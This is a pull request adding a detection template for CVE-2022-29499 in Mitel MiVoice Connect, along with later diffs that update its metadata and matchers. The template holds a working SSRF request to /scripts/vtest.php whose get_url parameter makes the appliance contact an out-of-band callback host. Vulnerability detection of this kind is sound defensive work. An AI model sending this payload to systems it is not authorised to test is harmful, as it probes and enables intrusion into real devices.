### PR TITLE
Create CVE-2022-29499.yaml

### DIFF
--- a/http/cves/2022/CVE-2022-29499.yaml
+++ b/http/cves/2022/CVE-2022-29499.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-29499
 
 info:
-  name: Mitel MiVoice Connect Remote Code Execution
+  name: Mitel MiVoice Connect - Remote Code Execution
   author: dmartyn
   severity: critical
   description: |
@@ -10,18 +10,29 @@ info:
     - https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002
     - https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/
     - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
+    - https://github.com/Ostorlab/KEV
+    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29499
+    cwe-id: CWE-20
+    epss-score: 0.03545
+    epss-percentile: 0.91412
+    cpe: cpe:2.3:a:mitel:mivoice_connect:*:*:*:*:*:*:*:*
   metadata:
-    verified: "true"
-  tags: cve,cve2023,oast,rce,ssrf,mitel,mivoice
+    vendor: mitel
+    product: mivoice_connect
+  tags: cve,cve2023,oast,rce,ssrf,mitel,mivoice,kev
 
 requests:
   - raw:
-      - | # try resolve
+      - |
         GET /scripts/vtest.php?get_url=http://{{interactsh-url}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: word
-        part: interactsh_protocol # Confirms the DNS Interaction
+        part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "dns"
+          - "http"

--- a/http/cves/2022/CVE-2022-29499.yaml
+++ b/http/cves/2022/CVE-2022-29499.yaml
@@ -2,26 +2,23 @@ id: CVE-2022-29499
 
 info:
   name: Mitel MiVoice Connect Remote Code Execution
+  author: dmartyn
+  severity: critical
   description: |
-    Make a Mitel do a DNS lookup by exploiting the SSRF component of the CVE-2022-29499 remote code execution vulnerability.
-    Does not exploit the second part of the bug chain to gain code execution, only uses the SSRF part.
+    The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.
   reference:
     - https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002
     - https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/
     - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
   metadata:
     verified: "true"
-  author: dmartyn
-  severity: medium
-  tags: dns,oob,rce,ssrf
-  
+  tags: cve,cve2023,oast,rce,ssrf,mitel,mivoice
+
 requests:
   - raw:
       - | # try resolve
         GET /scripts/vtest.php?get_url=http://{{interactsh-url}} HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Connection: close
 
     matchers:
       - type: word

--- a/http/cves/2022/CVE-2022-29499.yaml
+++ b/http/cves/2022/CVE-2022-29499.yaml
@@ -3,7 +3,7 @@ id: CVE-2022-29499
 info:
   name: Mitel MiVoice Connect Remote Code Execution
   description: | 
-    Make a Mitel do a DNS lookup by exploiting the SSRF component of the CVE-2022-29499 remote code execution vulnerability. 
+    Make a Mitel do a DNS lookup by exploiting the SSRF component of the CVE-2022-29499 remote code execution vulnerability.
     Does not exploit the second part of the bug chain to gain code execution, only uses the SSRF part.
   reference:
     - https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002
@@ -14,7 +14,7 @@ info:
   author: dmartyn
   severity: medium
   tags: dns,oob,rce,ssrf
-    
+  
 requests:
   - raw:
       - | # try resolve

--- a/http/cves/2022/CVE-2022-29499.yaml
+++ b/http/cves/2022/CVE-2022-29499.yaml
@@ -1,0 +1,30 @@
+id: CVE-2022-29499
+
+info:
+  name: Mitel MiVoice Connect Remote Code Execution
+  description: | 
+    Make a Mitel do a DNS lookup by exploiting the SSRF component of the CVE-2022-29499 remote code execution vulnerability. 
+    Does not exploit the second part of the bug chain to gain code execution, only uses the SSRF part.
+  reference:
+    - https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002
+    - https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/
+    - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
+  metadata:
+    verified: "true"
+  author: dmartyn
+  severity: medium
+  tags: dns,oob,rce,ssrf
+    
+requests:
+  - raw:
+      - | # try resolve
+        GET /scripts/vtest.php?get_url=http://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Connection: close
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"

--- a/http/cves/2022/CVE-2022-29499.yaml
+++ b/http/cves/2022/CVE-2022-29499.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-29499
 
 info:
   name: Mitel MiVoice Connect Remote Code Execution
-  description: | 
+  description: |
     Make a Mitel do a DNS lookup by exploiting the SSRF component of the CVE-2022-29499 remote code execution vulnerability.
     Does not exploit the second part of the bug chain to gain code execution, only uses the SSRF part.
   reference:


### PR DESCRIPTION
Adds a template for CVE-2022-29499 which exploits the first-part of the bug chain (an SSRF) to positively identify vulnerable Mitel MiVoice Connect appliances.

I've validated this template locally?
- [X] YES
- [ ] NO

I've tested this locally on a vulnerable instance, working on ensuring the testing log is redacted enough before I add it to this git issue if needed. 